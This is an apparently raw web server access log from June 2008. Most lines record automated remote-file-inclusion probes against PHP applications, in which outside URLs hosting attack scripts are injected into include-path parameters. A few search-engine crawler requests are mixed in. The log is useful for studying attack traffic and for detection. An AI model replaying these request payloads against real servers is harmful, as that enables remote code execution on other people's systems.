194.30.160.11 - - [24/Jun/2008:11:31:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:32 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:31:36 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:31:37 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:31:37 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:41 -0700] "GET /logs/access_080127.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:47 -0700] "GET /logs/access.log/forum.php?seite=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:47 -0700] "GET /logs/forum.php?seite=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.194.178 - - [24/Jun/2008:11:31:52 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.178 - - [24/Jun/2008:11:31:52 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:31:53 -0700] "GET /logs/access_080312.log/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:31:54 -0700] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:31:55 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:31:55 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:32:06 -0700] "GET /logs/access_080425.log//errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:32:06 -0700] "GET /logs//errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:32:06 -0700] "GET //errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:11:32:53 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:11:32:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:32:57 -0700] "GET /logs/access_080425.log//errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:32:57 -0700] "GET //errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:32:57 -0700] "GET /logs//errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:11:33:39 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:11:33:40 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:11:33:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:34:04 -0700] "GET /logs/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:34:05 -0700] "GET /logs/errors.php?error=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:34:05 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:34:06 -0700] "GET /errors.php?error=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:11:34:20 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:34:37 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:34:48 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:34:49 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:35:03 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:35:22 -0700] "GET /logs/access_080425.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:35:22 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:35:59 -0700] "GET /logs/access.log/index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.185 - - [24/Jun/2008:11:36:09 -0700] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:37:55 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:37:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:38:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:38:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:38:15 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:38:15 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:38:28 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:38:29 -0700] "GET /logs/access_080507.log/main.php?pagina=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:39:18 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:39:19 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:39:19 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:39:24 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:39:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:39:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:39:48 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:40:15 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:40:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:11:40:25 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:11:40:25 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:11:40:26 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:40:34 -0700] "GET /logs/access_080312.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:11:40:43 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
85.17.143.174 - - [24/Jun/2008:11:40:44 -0700] "GET /logs/access_080211.log/lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.143.174 - - [24/Jun/2008:11:40:44 -0700] "GET /lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.143.174 - - [24/Jun/2008:11:40:45 -0700] "GET /logs/lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:11:40:47 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:11:40:47 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.49 - - [24/Jun/2008:11:40:53 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [24/Jun/2008:11:40:54 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [24/Jun/2008:11:40:54 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:11:40:56 -0700] "GET /logs/access_080211.log/lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:11:40:56 -0700] "GET /lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:11:40:56 -0700] "GET /logs/lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:40:58 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:41:05 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:41:05 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.156.218.20 - - [24/Jun/2008:11:41:25 -0700] "GET /logs/access_080211.log/lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.156.218.20 - - [24/Jun/2008:11:41:25 -0700] "GET /lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.156.218.20 - - [24/Jun/2008:11:41:26 -0700] "GET /logs/lang.php?subpage=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.200 - - [24/Jun/2008:11:41:40 -0700] "GET /logs//errors.php?error=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [24/Jun/2008:11:41:41 -0700] "GET //errors.php?error=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.182.209 - - [24/Jun/2008:11:41:46 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [24/Jun/2008:11:41:46 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [24/Jun/2008:11:41:46 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:41:48 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:41:53 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:42:07 -0700] "GET /logs//errors.php?error=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:42:08 -0700] "GET //errors.php?error=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.182.209 - - [24/Jun/2008:11:42:08 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [24/Jun/2008:11:42:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [24/Jun/2008:11:42:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:42:14 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.143.195 - - [24/Jun/2008:11:42:20 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/Jun/2008:11:42:20 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/Jun/2008:11:42:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:42:25 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:42:25 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:42:41 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:42:45 -0700] "GET /megumi/minamigrad2k8/IMG_1708.CR2 HTTP/1.1" 200 9056650 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:42:52 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:42:52 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:42:52 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:43:08 -0700] "GET /logs/access_080425.log//errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:43:08 -0700] "GET /logs//errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:43:08 -0700] "GET //errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:43:09 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:43:10 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:43:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:43:13 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:43:13 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:43:13 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:11:43:22 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:11:43:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:11:43:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:43:47 -0700] "GET /megumi/minamigrad2k8/IMG_1614.CR2 HTTP/1.1" 200 11400691 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:11:43:58 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:11:43:58 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
